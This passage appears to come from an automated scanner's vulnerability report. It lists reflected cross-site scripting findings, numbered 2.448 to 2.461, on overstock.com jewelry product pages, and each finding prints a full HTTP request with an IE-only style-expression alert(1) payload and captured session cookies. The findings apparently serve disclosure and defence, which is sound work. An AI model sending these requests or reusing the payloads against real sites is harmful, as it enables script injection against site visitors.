GET /Jewelry-Watches/Sterling-Silver-Blue-Cubic-Zirconia-and-Marcasite-Earrings/4420243/product.html?2646f"style%3d"x%3aexpression(alert(1))"9dd5125efc2=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.448. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Bridal-Engagement-Ring-Set/4058274/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8751b"style%3d"x%3aexpression(alert(1))"d671170d7de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8751b"style="x:expression(alert(1))"d671170d7de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-CZ-Bridal-Engagement-Ring-Set/4058274/product.html?8751b"style%3d"x%3aexpression(alert(1))"d671170d7de=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.449. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-CZ-Heart-and-Key-Necklace/657565/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54ef"style%3d"x%3aexpression(alert(1))"ef87bd57044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d54ef"style="x:expression(alert(1))"ef87bd57044 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-CZ-Heart-and-Key-Necklace/657565/product.html?d54ef"style%3d"x%3aexpression(alert(1))"ef87bd57044=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.450. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Created-Sapphire-and-1-10ct-TDW-Diamond-Earrings-I-J-I3/4107532/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453f4"style%3d"x%3aexpression(alert(1))"340ab4128b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 453f4"style="x:expression(alert(1))"340ab4128b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Created-Sapphire-and-1-10ct-TDW-Diamond-Earrings-I-J-I3/4107532/product.html?453f4"style%3d"x%3aexpression(alert(1))"340ab4128b6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.451. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Cultured-Freshwater-Pearl-Bracelet/1897192/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10989"style%3d"x%3aexpression(alert(1))"8066f3fa43b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10989"style="x:expression(alert(1))"8066f3fa43b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Cultured-Freshwater-Pearl-Bracelet/1897192/product.html?10989"style%3d"x%3aexpression(alert(1))"8066f3fa43b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.452. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Diamond-Accent-Butterfly-Necklace/4138242/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a87"style%3d"x%3aexpression(alert(1))"822bb8d65e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7a87"style="x:expression(alert(1))"822bb8d65e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Diamond-Accent-Butterfly-Necklace/4138242/product.html?a7a87"style%3d"x%3aexpression(alert(1))"822bb8d65e5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.453. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Filigree-CZ-Ring/1006299/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3d28"style%3d"x%3aexpression(alert(1))"5b951d79f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3d28"style="x:expression(alert(1))"5b951d79f77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Filigree-CZ-Ring/1006299/product.html?a3d28"style%3d"x%3aexpression(alert(1))"5b951d79f77=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.454. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Large-Fleur-de-Lis-Necklace/3037717/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd95d"style%3d"x%3aexpression(alert(1))"fedbbf81975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd95d"style="x:expression(alert(1))"fedbbf81975 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Large-Fleur-de-Lis-Necklace/3037717/product.html?bd95d"style%3d"x%3aexpression(alert(1))"fedbbf81975=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.455. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Marcasite-and-Turquoise-Heart-Necklace/1871971/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfae1"style%3d"x%3aexpression(alert(1))"0c86dc771e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfae1"style="x:expression(alert(1))"0c86dc771e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Marcasite-and-Turquoise-Heart-Necklace/1871971/product.html?cfae1"style%3d"x%3aexpression(alert(1))"0c86dc771e0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.456. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Multi-gemstone-Stud-Earrings-Set-of-5/4094670/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a370"style%3d"x%3aexpression(alert(1))"f0f7e35724b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a370"style="x:expression(alert(1))"f0f7e35724b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Multi-gemstone-Stud-Earrings-Set-of-5/4094670/product.html?6a370"style%3d"x%3aexpression(alert(1))"f0f7e35724b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.457. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Onyx-and-Marcasite-Heart-Locket-Necklace/753913/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9569c"style%3d"x%3aexpression(alert(1))"b46594bac30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9569c"style="x:expression(alert(1))"b46594bac30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Onyx-and-Marcasite-Heart-Locket-Necklace/753913/product.html?9569c"style%3d"x%3aexpression(alert(1))"b46594bac30=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.458. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Oval-Turquoise-Hook-Earrings/3232265/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47edf"style%3d"x%3aexpression(alert(1))"bc163636ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47edf"style="x:expression(alert(1))"bc163636ab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Oval-Turquoise-Hook-Earrings/3232265/product.html?47edf"style%3d"x%3aexpression(alert(1))"bc163636ab3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.459. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Pave-Style-Round-Cut-CZ-Ring/2869562/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c95c"style%3d"x%3aexpression(alert(1))"e93b35f11b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c95c"style="x:expression(alert(1))"e93b35f11b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Pave-Style-Round-Cut-CZ-Ring/2869562/product.html?3c95c"style%3d"x%3aexpression(alert(1))"e93b35f11b3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.460. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Picture-Frame-Pendant/1037779/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72cbe"style%3d"x%3aexpression(alert(1))"d2be3f76bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72cbe"style="x:expression(alert(1))"d2be3f76bef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Sterling-Silver-Picture-Frame-Pendant/1037779/product.html?72cbe"style%3d"x%3aexpression(alert(1))"d2be3f76bef=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.461. http://www.overstock.com/Jewelry-Watches/Sterling-Silver-Princess-CZ-Bridal-Engagement-Ring-Set/4058275/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8918"style%3d"x%3aexpression(alert(1))"7ffafd6174f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8918"style="x:expression(alert(1))"7ffafd6174f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
